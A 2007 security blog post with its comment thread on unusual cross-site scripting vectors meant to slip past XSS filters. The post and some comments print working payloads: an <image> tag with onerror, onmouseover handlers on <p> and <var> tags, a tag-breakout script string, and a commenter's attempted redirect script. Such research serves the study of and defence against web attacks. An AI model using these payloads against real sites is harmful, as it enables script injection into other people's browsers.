Skip to content

Unusual XSS vectors

I’ve been working on my Hackvertor script to include XSS fuzzing which isn’t ready yet but I thought you might be interested in a few interesting results I’ve found :)

First off I’m sure you know you can use XSS in a img object yeah? Well did you know there’s also a image object as well? It can be used like this:-

<image src="" onerror="alert(/XSS/)" />

Pretty neat eh? It may get round some XSS filters. It’s not in RSnake’s cheatsheet after a quick check.

Next up you can even inject Javascript into paragraph tags or obscure html tags like the following:-

<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>

Or what about this:-

<var onmouseover=alert(/XSS/)>Some very long paragraph goes here.</var>

Many other tags are supported using this method. That is all for now I hope you enjoyed this little post, I shall release my fuzzing research once the features have been completed in Hackvertor.

Share and Enjoy:
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 10

  1. .mario wrote:

    Wow - the <image> issue is new indeed. The rest is just plain browser madness - Firefox in particular.

    <image/src onerror=alert(1)>

    Incredible… Nice find :) I await the day when Hackvertor hs an API with itching fingers ;)

    Posted 19 Nov 2007 at 12:30 pm
  2. Gareth Heyes wrote:

    Thanks Mario :) I’ve registered a domain for Hackvertor and once I’ve finished the look behind matching and completed the fuzzing features I’ll start work on a API, which should be cool :D

    Posted 19 Nov 2007 at 12:35 pm
  3. Marcin wrote:

    Cool! I wrote a http://www.tssci-security.com/archives/2007/11/15/blacklisting-xss-filter-evasion-and-other-resources/ a couple days ago about using <img src=”" onerror=alert(/xss/)> in a site review.. Didn’t even realize there was an <image> element that works the same.

    I’m going to have to try the onmouseover attribute next time around.

    Mario’s is a nice one too… I’m building up my own little cheat sheet as I go along. Perhaps XSS Cheat Sheet could use an update.

    :)

    Posted 19 Nov 2007 at 4:31 pm
  4. .mario wrote:

    onwhatever :)

    http://www.w3schools.com/dhtml/dhtml_events.asp

    MSIE even features dozens of additional ones…

    Posted 19 Nov 2007 at 5:11 pm
  5. Domber wrote:

    > It’s not in RSnake’s cheatsheet after a quick check.

    But in his Book ;-)
    “Cross Site Scripting Attacks: Xss Exploits and Defense”

    HTH

    Posted 22 Nov 2007 at 11:51 am
  6. Gareth Heyes wrote:

    @Domber

    He should update his cheatsheet then :)

    Posted 22 Nov 2007 at 12:13 pm
  7. Reelix wrote:

    An XSS attempt :)

    <script>window.location = ‘http://www.reelic.za.net/’></script>

    Posted 04 Aug 2008 at 12:37 pm
  8. Reelix wrote:

    ‘>”><script>alert(0)</script>

    Posted 04 Aug 2008 at 12:37 pm
  9. Gareth Heyes wrote:

    @Reelix

    1. You’d be getting a XSS on wordpress and not me.
    2. You didn’t get XSS
    3. This is boring

    Posted 04 Aug 2008 at 1:30 pm
  10. xss2root wrote:

    some filter is based on the HTML syntax,it will remove all attributs like on*,remove some unsafe tags and so on.
    the filter just like a browser,and it’s safe much more.

    Posted 15 Aug 2008 at 8:23 am

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam